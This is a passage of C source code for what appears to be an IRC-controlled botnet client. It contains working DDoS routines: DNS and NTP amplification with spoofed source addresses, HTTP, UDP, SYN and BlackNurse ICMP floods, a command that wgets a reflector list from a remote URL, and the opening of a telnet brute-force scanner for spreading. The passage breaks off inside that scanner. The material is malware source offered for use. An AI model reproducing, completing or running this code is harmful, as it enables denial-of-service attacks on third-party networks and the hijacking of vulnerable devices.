- unsigned short window;
- unsigned short check;
- unsigned short urg_ptr;
- };
- struct send_tcp {
- struct iphdr ip;
- struct tcphdr tcp;
- char buf[20];
- };
- struct pseudo_header {
- unsigned int source_address;
- unsigned int dest_address;
- unsigned char placeholder;
- unsigned char protocol;
- unsigned short tcp_length;
- struct tcphdr tcp;
- char buf[20];
- };
- unsigned int host2ip(char *sender,char *hostname) {
- static struct in_addr i;
- struct hostent *h;
- if((i.s_addr = inet_addr(hostname)) == -1) {
- if((h = gethostbyname(hostname)) == NULL) {
- Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
- exit(0);
- }
- bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
- }
- return i.s_addr;
- }
- static uint32_t Q[4096], c = 362436;
- struct list
- {
- struct sockaddr_in data;
- char domain[512];
- int line;
- struct list *next;
- struct list *prev;
- };
- struct list *head;
- struct thread_data{
- int thread_id;
- struct list *list_node;
- struct sockaddr_in sin;
- int port;
- };
- struct DNS_HEADER
- {
- unsigned short id; // identification number
- unsigned char rd :1; // recursion desired
- unsigned char tc :1; // truncated message
- unsigned char aa :1; // authoritive answer
- unsigned char opcode :4; // purpose of message
- unsigned char qr :1; // query/response flag
- unsigned char rcode :4; // response code
- unsigned char cd :1; // checking disabled
- unsigned char ad :1; // authenticated data
- unsigned char z :1; // its z! reserved
- unsigned char ra :1; // recursion available
- unsigned short q_count; // number of question entries
- unsigned short ans_count; // number of answer entries
- unsigned short auth_count; // number of authority entries
- unsigned short add_count; // number of resource entries
- };
- //Constant sized fields of query structure
- struct QUESTION
- {
- unsigned short qtype;
- unsigned short qclass;
- };
- //Constant sized fields of the resource record structure
- struct QUERY
- {
- unsigned char *name;
- struct QUESTION *ques;
- };
- void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
- {
- int lock = 0 , i;
- strcat((char*)host,".");
- for(i = 0 ; i < strlen((char*)host) ; i++)
- {
- if(host[i]=='.')
- {
- *dns++ = i-lock;
- for(;lock<i;lock++)
- {
- *dns++=host[lock];
- }
- lock++; //or lock=i+1;
- }
- }
- *dns++='\0';
- }
- void init_rand(uint32_t x)
- {
- int i;
- Q[0] = x;
- Q[1] = x + PHI;
- Q[2] = x + PHI + PHI;
- for (i = 3; i < 4096; i++)
- Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
- }
- uint32_t rand_cmwc(void)
- {
- uint64_t t, a = 18782LL;
- static uint32_t i = 4095;
- uint32_t x, r = 0xfffffffe;
- i = (i + 1) & 4095;
- t = a * Q[i] + c;
- c = (t >> 32);
- x = t + c;
- if (x < c) {
- x++;
- c++;
- }
- return (Q[i] = r - x);
- }
- void setup_udp_header(struct udphdr *udph)
- {
- }
- void *flood(void *par1)
- {
- struct thread_data *td = (struct thread_data *)par1;
- fprintf(stdout, "Thread %d started\n", td->thread_id);
- char strPacket[MAX_PACKET_SIZE];
- int iPayloadSize = 0;
- struct sockaddr_in sin = td->sin;
- struct list *list_node = td->list_node;
- int iPort = td->port;
- int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
- if(s < 0)
- {
- fprintf(stderr, "Could not open raw socket. You need to be root!\n");
- exit(-1);
- }
- //init random
- init_rand(time(NULL));
- // Clear the data
- memset(strPacket, 0, MAX_PACKET_SIZE);
- // Make the packet
- struct iphdr *iph = (struct iphdr *) &strPacket;
- iph->ihl = 5;
- iph->version = 4;
- iph->tos = 0;
- iph->tot_len = sizeof(struct iphdr) + 38;
- iph->id = htonl(54321);
- iph->frag_off = 0;
- iph->ttl = MAXTTL;
- iph->protocol = IPPROTO_UDP;
- iph->check = 0;
- iph->saddr = inet_addr("192.168.3.100");
- iPayloadSize += sizeof(struct iphdr);
- struct udphdr *udph = (struct udphdr *) &strPacket[iPayloadSize];
- udph->source = htons(iPort);
- udph->dest = htons(53);
- udph->check = 0;
- iPayloadSize += sizeof(struct udphdr);
- struct DNS_HEADER *dns = (struct DNS_HEADER *) &strPacket[iPayloadSize];
- dns->id = (unsigned short) htons(rand_cmwc());
- dns->qr = 0; //This is a query
- dns->opcode = 0; //This is a standard query
- dns->aa = 0; //Not Authoritative
- dns->tc = 0; //This message is not truncated
- dns->rd = 1; //Recursion Desired
- dns->ra = 0; //Recursion not available! hey we dont have it
- dns->z = 0;
- dns->ad = 0;
- dns->cd = 0;
- dns->rcode = 0;
- dns->q_count = htons(1); //we have only 1 question
- dns->ans_count = 0;
- dns->auth_count = 0;
- dns->add_count = htons(1);
- iPayloadSize += sizeof(struct DNS_HEADER);
- sin.sin_port = udph->source;
- iph->saddr = sin.sin_addr.s_addr;
- iph->daddr = list_node->data.sin_addr.s_addr;
- iph->check = ccsum ((unsigned short *) strPacket, iph->tot_len >> 1);
- char strDomain[512];
- int i;
- int j = 0;
- int iAdditionalSize = 0;
- while(1)
- {
- if(j==2){
- usleep(100);
- j=0;
- }
- //set the next node
- list_node = list_node->next;
- //Clear the old domain and question
- memset(&strPacket[iPayloadSize + iAdditionalSize], 0, iAdditionalSize+256);
- //add the chosen domain and question
- iAdditionalSize = 0;
- unsigned char *qname = (unsigned char*) &strPacket[iPayloadSize + iAdditionalSize];
- strcpy(strDomain, list_node->domain);
- ChangetoDnsNameFormat(qname, strDomain);
- //printf("!!%s %d\n", list_node->domain, list_node->line);
- iAdditionalSize += strlen(qname) + 1;
- struct QUESTION *qinfo = (struct QUESTION *) &strPacket[iPayloadSize + iAdditionalSize];
- qinfo->qtype = htons(255); //type of the query , A , MX , CNAME , NS etc
- qinfo->qclass = htons(1);
- iAdditionalSize += sizeof(struct QUESTION);
- strPacket[iPayloadSize + iAdditionalSize] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 1] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 2] = 0x29;
- strPacket[iPayloadSize + iAdditionalSize + 3] = 0x23;
- strPacket[iPayloadSize + iAdditionalSize + 4] = 0x28;
- strPacket[iPayloadSize + iAdditionalSize + 5] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 6] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 7] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 8] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 9] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 10] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 11] = 0x00;
- iAdditionalSize += 11;
- //set new node data
- iph->daddr = list_node->data.sin_addr.s_addr;
- udph->len= htons((iPayloadSize + iAdditionalSize) - sizeof(struct iphdr));
- iph->tot_len = iPayloadSize + iAdditionalSize;
- udph->source = htons(rand_cmwc() & 0xFFFF);
- iph->check = ccsum ((unsigned short *) strPacket, iph->tot_len >> 1);
- //send
- for(i = 0; i < PACKETS_PER_RESOLVER; i++)
- {
- sendto(s, strPacket, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
- }
- j++;
- }
- }
- void ParseResolverLine(char *strLine, int iLine)
- {
- char caIP[32] = "";
- char caDNS[512] = "";
- int i;
- char buffer[512] = "";
- int moved = 0;
- for(i = 0; i < strlen(strLine); i++)
- {
- if(strLine[i] == ' ' || strLine[i] == '\n' || strLine[i] == '\t')
- {
- moved++;
- continue;
- }
- if(moved == 0)
- {
- caIP[strlen(caIP)] = (char) strLine[i];
- }
- else if(moved == 1)
- {
- caDNS[strlen(caDNS)] = (char) strLine[i];
- }
- }
- //printf("Found resolver %s, domain %s!\n", caIP, caDNS);
- if(head == NULL)
- {
- head = (struct list *)malloc(sizeof(struct list));
- bzero(&head->data, sizeof(head->data));
- head->data.sin_addr.s_addr=inet_addr(caIP);
- head->data.sin_port=htons(53);
- strcpy(head->domain, caDNS);
- head->line = iLine;
- head->next = head;
- head->prev = head;
- }
- else
- {
- struct list *new_node = (struct list *)malloc(sizeof(struct list));
- memset(new_node, 0x00, sizeof(struct list));
- new_node->data.sin_addr.s_addr=inet_addr(caIP);
- new_node->data.sin_port=htons(53);
- strcpy(new_node->domain, caDNS);
- new_node->prev = head;
- head->line = iLine;
- new_node->next = head->next;
- head->next = new_node;
- }
- }
- void dnsamp(int sockfd, char *sender, int argc, char **argv)
- {
- if (mfork(sender) != 0) return;
- if(argc < 4)
- {
- Send(sock, "NOTICE %s :DNSAMP <IP> <port> <reflection file url> <threads> <time>\n", sender);
- exit(-1);
- }
- char *command[128];
- sprintf(command,"wget \"");
- strcat(command, argv[3]);
- strcat(command,"\" -q -O DNS.txt");
- system(command);
- head = NULL;
- char *strLine = (char *) malloc(256);
- strLine = memset(strLine, 0x00, 256);
- char strIP[32] = "";
- char strDomain[256] = "";
- int iLine = 0; // 0 = ip, 1 = domain.
- FILE *list_fd = fopen("DNS.txt", "r");
- while(fgets(strLine, 256, list_fd) != NULL)
- {
- ParseResolverLine(strLine, iLine);
- iLine++;
- }
- int i = 0;
- int num_threads = atoi(argv[4]);
- struct list *current = head->next;
- pthread_t thread[num_threads];
- struct sockaddr_in sin;
- sin.sin_family = AF_INET;
- sin.sin_port = htons(0);
- sin.sin_addr.s_addr = inet_addr(argv[1]);
- struct thread_data td[num_threads];
- int iPort = atoi(argv[2]);
- printf("Target: %s:%d\n", argv[1], iPort);
- for(i = 0; i < num_threads; i++)
- {
- td[i].thread_id = i;
- td[i].sin= sin;
- td[i].list_node = current;
- td[i].port = iPort;
- pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
- }
- Send(sock, "NOTICE %s :DNS amp attacking %s\n", sender,argv[1]);
- fprintf(stdout, "Starting Flood... Nigga!!\n");
- if(argc > 4)
- {
- sleep(atoi(argv[5]));
- }
- else
- {
- while(1)
- {
- sleep(1);
- }
- }
- exit(1);
- }
- void sendHTTP(int sock, char *sender, int argc, char **argv) {
- unsigned char *url;
- int end_time;
- if (mfork(sender) != 0) return;
- if (argc < 2) {
- Send(sock, "NOTICE %s :HTTPFLOOD <url> <secs>\n", sender);
- exit(1);
- }
- url = argv[1];
- end_time = atoi(argv[2]);
- int end = time(NULL) + end_time;
- char *UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
- char *command[128];
- Send(sock, "NOTICE %s :HTTP Flooding %s\n", sender, url);
- while(end > time(NULL))
- {
- UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
- sprintf(command,"wget -U \"");
- strcat(command, UA);
- strcat(command,"\" -q ");
- strcat(command, url);
- strcat(command, " -O /dev/null &");
- system(command);
- }
- exit(1);
- }
- //Struct for UDP Packet
- struct udpheader{
- unsigned short int udp_sourcePortNumber;
- unsigned short int udp_destinationPortNumber;
- unsigned short int udp_length;
- unsigned short int udp_checksum;
- };
- // Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler
- struct ntpreqheader {
- unsigned char rm_vn_mode; /* response, more, version, mode */
- unsigned char auth_seq; /* key, sequence number */
- unsigned char implementation; /* implementation number */
- unsigned char request; /* request number */
- unsigned short err_nitems; /* error code/number of data items */
- unsigned short mbz_itemsize; /* item size */
- char data[40]; /* data area [32 prev](176 byte max) */
- unsigned long tstamp; /* time stamp, for authentication */
- unsigned int keyid; /* encryption key */
- char mac[8]; /* (optional) 8 byte auth code */
- };
- void ntp(int sock, char *sender, int argc, char **argv) {
- unsigned long secs;
- int i,get;
- if (mfork(sender) != 0) return;
- time_t start=time(NULL);
- if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
- if (argc < 3) {
- Send(sock, "NOTICE %s :NTP <target> <ntp server> <secs>\n", sender);
- exit(1);
- }
- secs = atol(argv[3]);
- int status; // Maintains the return values of the functions
- struct iphdr *ip; // Pointer to ip header struct
- struct udpheader *udp; // Pointer to udp header struct
- struct ntpreqheader *ntp; // Pointer to ntp request header struct
- int sockfd; // Maintains the socket file descriptor
- int one = 1; // Sets the option IP_HDRINCL of the sockt to tell the kernel that the header are alredy included on the packets.
- struct sockaddr_in dest; // Maintains the data of the destination address
- char packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; //Packet itself
- // Parameters check
- if( argc != 3){
- exit(1);
- }
- // Create a socket and tells the kernel that we want to use udp as layer 4 protocol
- sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
- if (sockfd == -1){
- printf("Error on initializing the socket\n");
- exit(1);
- }
- //Sets the option IP_HDRINCL
- status = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);
- if (status == -1){
- printf("Error on setting the option HDRINCL on socket\n");
- exit(1);
- }
- //"Zeroes" all the packet stack
- memset( packet, 0, sizeof(packet) );
- //Mounts the packet headers
- // [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!!
- ip = (struct iphdr *)packet;
- udp = (struct udpheader *) (packet + sizeof(struct iphdr) );
- ntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );
- //Fill the IP Header
- ip->version = 4; //IPv4
- ip->ihl = 5; //Size of the Ip header, minimum 5
- ip->tos = 0; //Type of service, the default value is 0
- ip->tot_len = sizeof(packet); //Size of the datagram
- ip->id = htons(1234); //LengthIdentification Number
- ip->frag_off = 0; //Flags, zero represents reserved
- ip->ttl = 255; //Time to Live. Maximum of 255
- ip->protocol = IPPROTO_UDP; //Sets the UDP as the next layer protocol
- ip->check = 0; //Checksum.
- ip->saddr = inet_addr( argv[1] ); //Source ip ( spoofing goes here)
- //Fills the UDP Header
- udp->udp_sourcePortNumber = htons( atoi( "123" ) ); //Source Port
- udp->udp_destinationPortNumber = htons(atoi("123")) ; //Destination Port
- udp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); //Length of the packet
- udp->udp_checksum = 0; //Checksum
- //Calculate the checksums
- //ip->check = ((unsigned short *)packet, ip->tot_len); //Calculate the checksum for iP header
- //Sets the destination data
- dest.sin_family = AF_INET; // Address Family Ipv4
- dest.sin_port = htons (atoi( "123" ) ) ; // Destination port
- //Fills the NTP header
- //Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST
- //To do this we can import the ntp_types.h and use its structures and macros. To simplify i've created a simple version of the
- // ntp request packet and hardcoded the values for the fields to make a "MON_GETLIST" request packet.
- // To learn more, read this: http://searchcode.com/codesearch/view/451164#127
- ntp->rm_vn_mode=0x17; //Sets the response bit to 0, More bit to 0, Version field to 2, Mode field to 7
- ntp->implementation=0x03; //Sets the implementation to 3
- ntp->request=0x2a; //Sets the request field to 42 ( MON_GETLIST )
- //All the other fields of the struct are zeroed
- ip->daddr = inet_addr( argv[2] ); //Destination IP
- dest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination Endereço para onde se quer enviar o pacote
- Send(sock, "NOTICE %s :NTP amp attacking %s\n", sender, argv[1]);
- for (;;) {
- status = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );
- if(status <0){
- printf("Failed to send the packets\n");
- exit(1);
- }
- if (i >= 50) {
- if (time(NULL) >= start+secs) {
- exit(0);
- }
- i=0;
- }
- i++;
- }
- }
- void blacknurse(int sock, char *sender, int argc, char *argv[])
- {
- uint8_t pkt_template[] = {
- 0x03, 0x03, 0x0d, 0x33, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x1c, 0x4a, 0x04, 0x00, 0x00,
- 0x40, 0x06, 0x20, 0xc5, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x08, 0xef, 0xc1
- };
- uint8_t *pkt;
- struct addrinfo *ai, hints;
- const char *host;
- struct pollfd pfd;
- const size_t pkt_len = (sizeof pkt_template) / (sizeof pkt_template[0]);
- size_t i;
- int gai_err;
- int kindy;
- int x, secs,get;
- time_t start=time(NULL);
- if (mfork(sender) != 0) return;
- if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
- if (argc < 2) {
- Send(sock, "NOTICE %s :BLACKNURSE <target ip> <secs>", sender);
- exit(1);
- }
- host = argv[1];
- secs = argv[2];
- memset(&hints, 0, sizeof hints);
- hints.ai_family = AF_INET;
- if ((gai_err = getaddrinfo(host, NULL, &hints, &ai)) != 0) {
- fprintf(stderr, "Unable to use [%s]: %s\n", host,
- gai_strerror(gai_err));
- exit(1);
- }
- if ((kindy = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) {
- perror("socket");
- exit(1);
- }
- Send(sock, "NOTICE %s :Blacknursing %s", sender, host);
- pkt = pkt_template;
- pfd.fd = kindy;
- pfd.events = POLLOUT;
- for (;;) {
- for (i = 20; i < 20 + 8 + 4; i++) {
- pkt[i] = (uint8_t) rand();
- }
- if (sendto(kindy, pkt, pkt_len, 0,
- ai->ai_addr, ai->ai_addrlen) != (ssize_t) pkt_len) {
- if (errno == ENOBUFS) {
- poll(&pfd, 1, 1000);
- continue;
- }
- perror("sendto");
- break;
- }
- if (i >= 50) {
- if (time(NULL) >= start+secs) exit(0);
- x=0;
- }
- x++;
- }
- /* NOTREACHED */
- close(kindy);
- freeaddrinfo(ai);
- return;
- }
- void udp(int sock, char *sender, int argc, char **argv) {
- unsigned int port,i=0;
- unsigned long psize,target,secs;
- struct sockaddr_in s_in;
- struct iphdr *ip;
- struct udphdr *udp;
- char buf[1500],*str;
- int get;
- time_t start=time(NULL);
- if (mfork(sender) != 0) return;
- if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
- if (argc < 3) {
- Send(sock, "NOTICE %s :UDP <target> <port> <secs>\n", sender);
- exit(1);
- }
- target = host2ip(sender,argv[1]);
- port = atoi(argv[2]);
- secs = atol(argv[3]);
- ip=(void*)buf;
- udp=(void*)(buf+sizeof(struct iphdr));
- str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr));
- memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr)));
- Send(sock, "NOTICE %s :Packeting %s.\n", sender,argv[1]);
- ip->ihl = 5;
- ip->version = 4;
- ip->tos = 0;
- ip->tot_len = 1500;
- ip->frag_off = 0;
- ip->protocol = 17;
- ip->ttl = 64;
- ip->daddr = target;
- udp->len = htons(psize);
- s_in.sin_family = AF_INET;
- s_in.sin_addr.s_addr = target;
- for (;;) {
- udp->source = rand();
- if (port) udp->dest = htons(port);
- else udp->dest = rand();
- udp->check = in_cksum((u_short *)buf,1500);
- ip->saddr = getspoof();
- ip->id = rand();
- ip->check = in_cksum((u_short *)buf,1500);
- s_in.sin_port = udp->dest;
- sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in));
- if (i >= 50) {
- if (time(NULL) >= start+secs) exit(0);
- i=0;
- }
- i++;
- }
- }
- void pan(int sock, char *sender, int argc, char **argv) {
- struct send_tcp send_tcp;
- struct pseudo_header pseudo_header;
- struct sockaddr_in sin;
- unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
- unsigned int psize=20, source, dest, check;
- unsigned long saddr, daddr,secs;
- int get;
- time_t start=time(NULL);
- if (mfork(sender) != 0) return;
- if (argc < 3) {
- Send(sock, "NOTICE %s :PAN <target> <port> <secs>\n", sender);
- exit(1);
- }
- if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
- {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
- daddr=host2ip(sender,argv[1]);
- secs=atol(argv[3]);
- Send(sock, "NOTICE %s :Panning %s.\n", sender,argv[1]);
- send_tcp.ip.ihl = 5;
- send_tcp.ip.version = 4;
- send_tcp.ip.tos = 16;
- send_tcp.ip.frag_off = 64;
- send_tcp.ip.ttl = 64;
- send_tcp.ip.protocol = 6;
- send_tcp.tcp.ack_seq = 0;
- send_tcp.tcp.doff = 10;
- send_tcp.tcp.res1 = 0;
- send_tcp.tcp.cwr = 0;
- send_tcp.tcp.ece = 0;
- send_tcp.tcp.urg = 0;
- send_tcp.tcp.ack = 0;
- send_tcp.tcp.psh = 0;
- send_tcp.tcp.rst = 0;
- send_tcp.tcp.fin = 0;
- send_tcp.tcp.syn = 1;
- send_tcp.tcp.window = 30845;
- send_tcp.tcp.urg_ptr = 0;
- dest=htons(atoi(argv[2]));
- while(1) {
- source=rand();
- if (atoi(argv[2]) == 0) dest=rand();
- saddr=getspoof();
- send_tcp.ip.tot_len = htons(40+psize);
- send_tcp.ip.id = rand();
- send_tcp.ip.saddr = saddr;
- send_tcp.ip.daddr = daddr;
- send_tcp.ip.check = 0;
- send_tcp.tcp.source = source;
- send_tcp.tcp.dest = dest;
- send_tcp.tcp.seq = rand();
- send_tcp.tcp.check = 0;
- sin.sin_family = AF_INET;
- sin.sin_port = dest;
- sin.sin_addr.s_addr = send_tcp.ip.daddr;
- send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
- check = rand();
- send_tcp.buf[9]=((char*)&check)[0];
- send_tcp.buf[10]=((char*)&check)[1];
- send_tcp.buf[11]=((char*)&check)[2];
- send_tcp.buf[12]=((char*)&check)[3];
- pseudo_header.source_address = send_tcp.ip.saddr;
- pseudo_header.dest_address = send_tcp.ip.daddr;
- pseudo_header.placeholder = 0;
- pseudo_header.protocol = IPPROTO_TCP;
- pseudo_header.tcp_length = htons(20+psize);
- bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
- bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
- send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
- sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
- if (a >= 50) {
- if (time(NULL) >= start+secs) exit(0);
- a=0;
- }
- a++;
- }
- close(get);
- exit(0);
- }
- void unknown(int sock, char *sender, int argc, char **argv) {
- int flag=1,fd,i;
- unsigned long secs;
- char *buf=(char*)malloc(9216);
- struct hostent *hp;
- struct sockaddr_in in;
- time_t start=time(NULL);
- if (mfork(sender) != 0) return;
- if (argc < 2) {
- Send(sock, "NOTICE %s :UNKNOWN <target> <secs>\n", sender);
- exit(1);
- }
- secs=atol(argv[2]);
- memset((void*)&in,0,sizeof(struct sockaddr_in));
- in.sin_addr.s_addr=host2ip(sender,argv[1]);
- in.sin_family = AF_INET;
- Send(sock, "NOTICE %s :Unknowning %s.\n", sender,argv[1]);
- while(1) {
- in.sin_port = rand();
- if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
- else {
- flag=1;
- ioctl(fd,FIONBIO,&flag);
- sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
- close(fd);
- }
- if (i >= 50) {
- if (time(NULL) >= start+secs) break;
- i=0;
- }
- i++;
- }
- close(fd);
- exit(0);
- }
- static void printchar(unsigned char **str, int c) {
- if (str) {
- **str = c;
- ++(*str);
- }
- else (void)write(1, &c, 1);
- }
- static int prints(unsigned char **out, const unsigned char *string, int width, int pad) {
- register int pc = 0, padchar = ' ';
- if (width > 0) {
- register int len = 0;
- register const unsigned char *ptr;
- for (ptr = string; *ptr; ++ptr) ++len;
- if (len >= width) width = 0;
- else width -= len;
- if (pad & PAD_ZERO) padchar = '0';
- }
- if (!(pad & PAD_RIGHT)) {
- for ( ; width > 0; --width) {
- printchar (out, padchar);
- ++pc;
- }
- }
- for ( ; *string ; ++string) {
- printchar (out, *string);
- ++pc;
- }
- for ( ; width > 0; --width) {
- printchar (out, padchar);
- ++pc;
- }
- return pc;
- }
- static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) {
- unsigned char print_buf[PRINT_BUF_LEN];
- register unsigned char *s;
- register int t, neg = 0, pc = 0;
- register unsigned int u = i;
- if (i == 0) {
- print_buf[0] = '0';
- print_buf[1] = '\0';
- return prints (out, print_buf, width, pad);
- }
- if (sg && b == 10 && i < 0) {
- neg = 1;
- u = -i;
- }
- s = print_buf + PRINT_BUF_LEN-1;
- *s = '\0';
- while (u) {
- t = u % b;
- if( t >= 10 )
- t += letbase - '0' - 10;
- *--s = t + '0';
- u /= b;
- }
- if (neg) {
- if( width && (pad & PAD_ZERO) ) {
- printchar (out, '-');
- ++pc;
- --width;
- }
- else {
- *--s = '-';
- }
- }
- return pc + prints (out, s, width, pad);
- }
- static int print(unsigned char **out, const unsigned char *format, va_list args ) {
- register int width, pad;
- register int pc = 0;
- unsigned char scr[2];
- for (; *format != 0; ++format) {
- if (*format == '%') {
- ++format;
- width = pad = 0;
- if (*format == '\0') break;
- if (*format == '%') goto out;
- if (*format == '-') {
- ++format;
- pad = PAD_RIGHT;
- }
- while (*format == '0') {
- ++format;
- pad |= PAD_ZERO;
- }
- for ( ; *format >= '0' && *format <= '9'; ++format) {
- width *= 10;
- width += *format - '0';
- }
- if( *format == 's' ) {
- register char *s = (char *)va_arg( args, int );
- pc += prints (out, s?s:"(null)", width, pad);
- continue;
- }
- if( *format == 'd' ) {
- pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
- continue;
- }
- if( *format == 'x' ) {
- pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
- continue;
- }
- if( *format == 'X' ) {
- pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
- continue;
- }
- if( *format == 'u' ) {
- pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
- continue;
- }
- if( *format == 'c' ) {
- scr[0] = (unsigned char)va_arg( args, int );
- scr[1] = '\0';
- pc += prints (out, scr, width, pad);
- continue;
- }
- }
- else {
- out:
- printchar (out, *format);
- ++pc;
- }
- }
- if (out) **out = '\0';
- va_end( args );
- return pc;
- }
- int szprintf(unsigned char *out, const unsigned char *format, ...) {
- va_list args;
- va_start( args, format );
- return print( &out, format, args );
- }
- in_addr_t getRandomPublicIP() {
- static uint8_t ipState[4] = {0};
- ipState[0] = rand() % 223;
- ipState[1] = rand() % 255;
- ipState[2] = rand() % 255;
- ipState[3] = rand() % 255;
- while(
- (ipState[0] == 0) ||
- (ipState[0] == 10) ||
- (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
- (ipState[0] == 127) ||
- (ipState[0] == 169 && ipState[1] == 254) ||
- (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
- (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
- (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
- (ipState[0] == 192 && ipState[1] == 168) ||
- (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
- (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
- (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
- (ipState[0] >= 224)
- )
- {
- ipState[0] = rand() % 223;
- ipState[1] = rand() % 255;
- ipState[2] = rand() % 255;
- ipState[3] = rand() % 255;
- }
- char ip[16] = {0};
- szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
- return inet_addr(ip);
- }
- int negotiate(int sock, unsigned char *buf, int len) {
- unsigned char c;
- switch (buf[1]) {
- case CMD_IAC: return 0;
- case CMD_WILL:
- case CMD_WONT:
- case CMD_DO:
- case CMD_DONT:
- c = CMD_IAC;
- send(sock, &c, 1, MSG_NOSIGNAL);
- if (CMD_WONT == buf[1]) c = CMD_DONT;
- else if (CMD_DONT == buf[1]) c = CMD_WONT;
- else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
- else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
- send(sock, &c, 1, MSG_NOSIGNAL);
- send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
- break;
- default:
- break;
- }
- return 0;
- }
- int contains_string(char* buffer, char** strings) {
- int num_strings = 0, i = 0;
- for(num_strings = 0; strings[++num_strings] != 0; );
- for(i = 0; i < num_strings; i++) {
- if(strcasestr(buffer, strings[i])) {
- return 1;
- }
- }
- return 0;
- }
- int contains_success(char* buffer) {
- return contains_string(buffer, successes);
- }
- int contains_fail(char* buffer) {
- return contains_string(buffer, fails);
- }
- int contains_response(char* buffer) {
- return contains_success(buffer) || contains_fail(buffer);
- }
- int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) {
- fd_set read_set;
- struct timeval tv;
- tv.tv_sec = 0;
- tv.tv_usec = timeout_usec;
- FD_ZERO(&read_set);
- FD_SET(fd, &read_set);
- if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
- return 0;
- return recv(fd, buffer, buf_size, 0);
- }
- int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) {
- int num_bytes, i;
- memset(buffer, 0, buf_size);
- num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
- if(buffer[0] == 0xFF) {
- negotiate(fd, buffer, 3);
- }
- if(contains_string(buffer, strings)) {
- return 1;
- }
- return 0;
- }
- const char* get_telstate_host(struct telstate_t* telstate) { // get host
- struct in_addr in_addr_ip;
- in_addr_ip.s_addr = telstate->ip;
- return inet_ntoa(in_addr_ip);
- }
- void advance_telstate(struct telstate_t* telstate, int new_state) { // advance
- if(new_state == 0) {
- close(telstate->fd);
- }
- telstate->tTimeout = 0;
- telstate->state = new_state;
- memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
- }
- void reset_telstate(struct telstate_t* telstate) { // reset
- advance_telstate(telstate, 0);
- telstate->complete = 1;
- }
- void TelnetScanner(int wait_usec, int maxfds, int sock) {
- int max = getdtablesize() - 100, i, res, num_tmps, j;
- char buf[128], cur_dir;
- if (max > maxfds)
- max = maxfds;
- fd_set fdset;
- struct timeval tv;
- socklen_t lon;
- int valopt;
- char line[256];
- char* buffer;
- struct sockaddr_in dest_addr;
